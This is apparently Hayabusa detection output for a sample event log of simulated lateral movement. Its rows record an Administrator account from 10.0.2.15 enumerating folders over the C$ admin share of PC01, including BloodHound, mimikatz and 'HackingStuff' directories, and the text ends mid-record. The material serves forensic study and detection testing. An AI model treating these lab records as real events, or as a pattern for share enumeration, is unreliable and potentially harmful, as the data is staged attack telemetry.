0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.429 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.429 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.429 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.459 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.459 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.459 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.469 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.469 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.479 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.479 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.489 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.489 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.489 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.499 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.499 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.509 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.519 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.519 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.519 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.529 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.539 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.539 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.539 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.549 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.549 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 14:23:25.549 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.559 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.569 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.579 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.589 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 